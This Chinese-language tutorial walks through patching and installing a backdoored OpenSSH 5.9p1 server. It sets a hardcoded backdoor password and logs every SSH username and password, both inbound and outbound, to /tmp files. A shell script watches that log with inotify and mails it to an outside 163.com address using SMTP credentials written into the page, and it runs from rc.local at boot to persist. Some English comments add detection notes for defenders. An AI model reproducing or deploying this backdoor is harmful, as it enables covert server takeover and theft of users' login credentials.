软件包
- 0x06-openssh-5.9p1.patch.tar.gz
- openssh-5.9p1.tar.gz
- inotify-tools-3.13.tar.gz
1、安装 gcc
[root@ localhost ~]# yum -y install epel-release
[root@ localhost ~]# yum -y install gcc
2、安装 0x06-openssh 和 openssh
[root@ localhost ~]# tar -xvzf openssh-5.9p1.tar.gz
[root@ localhost ~]# tar -xvzf 0x06-openssh-5.9p1.patch.tar.gz
3、打补丁
[root@ localhost ~]# cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
[root@ localhost openssh-5.9p1]# patch < sshbd5.9p1.diff
[root@ localhost ~]# vim openssh-5.9p1/includes.h
177 #define ILOG "/tmp/ilog" #记录登录到本机的用户名和密码
178 #define OLOG "/tmp/olog" #记录从本机登录到其他服务器上的用户名和密码
179 #define SECRETPW "123" #你后门密码
4、安装打了后门补丁的sshd服务
[root@ localhost ~]# yum install -y openssl openssl-devel pam-devel zlib zlib-devel
[root@ localhost openssh-5.9p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
[root@ localhost openssh-5.9p1]# make -j 4 && make install^C
5、将用户名和密码发送到邮箱
[root@ localhost ~]# vim /etc/mail.rc
set from=yzy2284356425@163.com smtp=smtp.163.com
set smtp-auth-user=yzy2284356425 smtp-auth-password=yzy8800 smtp-auth=login
[root@ localhost ~]# mail -s "demo title" yzy2284356425@163.com < /tmp/ilog
set from=邮箱
set smtp-auth-user=收件人姓名
smtp-auth-password=邮箱授权码
6、shell脚本+inotify自动发送邮件
安装 inotify
[root@ localhost ~]# tar -xvzf inotify-tools-3.13.tar.gz
[root@ localhost ~]# cd inotify-tools-3.13
[root@ localhost ~]# ./configure
[root@ localhost ~]# make -j 4 && make install
编写脚本
[root@ localhost ~]# vim /bin/zipmail
#!/bin/bash
# Watches /tmp/ilog with inotifywait and, on every reported event, mails the
# file's contents to a fixed address. Earlier on this page /tmp/ilog is defined
# (ILOG in includes.h) as the record of usernames and passwords used to log in
# to this host, so each event sends that credential log off the machine.
#
# Detection notes for defenders, taken from what this script runs:
#   - a long-lived /usr/local/bin/inotifywait process whose argument is /tmp/ilog
#   - repeated mail invocations reading /tmp/ilog (the page configures
#     /etc/mail.rc to relay through an external SMTP server)
#   - the presence of /bin/zipmail and /tmp/ilog themselves
#
# inotifywait flags: -m keep monitoring, -r recursive, -q quiet; -e restricts
# the watch to create, move, delete and modify events.
# The three fields read into a, b and c are not used by the loop body.
/usr/local/bin/inotifywait -mrq -e create,move,delete,modify /tmp/ilog | while read a b c
do
# Takes the first ifconfig line containing "inet", then the text after ':' in
# its second field. NOTE(review): presumably the host address in
# "inet addr:x.x.x.x" style output; confirm against the target ifconfig format.
ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`
# Mail subject is the extracted value; the body is the whole /tmp/ilog file.
mail -s $ip yzy2284356425@163.com < /tmp/ilog
done
设置 zipmail脚本开机自启
[root@ localhost ~]# vim /etc/rc.local
# Starts the /tmp/ilog watcher in the background from /etc/rc.local, i.e. at
# boot. An unexpected /bin/zipmail entry here is a persistence indicator.
/bin/zipmail &